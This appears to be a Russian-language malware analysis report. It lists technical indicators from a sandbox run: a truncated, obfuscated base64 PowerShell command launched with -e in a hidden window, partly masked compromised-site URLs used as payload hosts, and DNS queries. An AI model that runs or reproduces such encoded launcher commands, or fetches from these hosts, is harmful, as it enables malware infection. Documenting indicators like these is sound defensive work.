Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...
- 'so#####sbrotinho.com.br':80
- 'pr###ed.com.mx':80
- http://ab#####dbelow.com.au/cgi-bin/Lbi20Tu/
- http://at####eacademy.net/wp-admin/VDDlV/
- http://www.at####eacademy.net/wp-admin/VDDlV/
- http://in####igence.com.sg/registration/JGX3I/
- http://www.in####igence.com.sg/registration/JGX3I/
- DNS ASK ab#####dbelow.com.au
- DNS ASK am######erscreens.com.au
- DNS ASK at####eacademy.net
- DNS ASK ja#####ectronics.com
- DNS ASK in####igence.com.sg
- DNS ASK so#####sbrotinho.com.br
- DNS ASK pr###ed.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)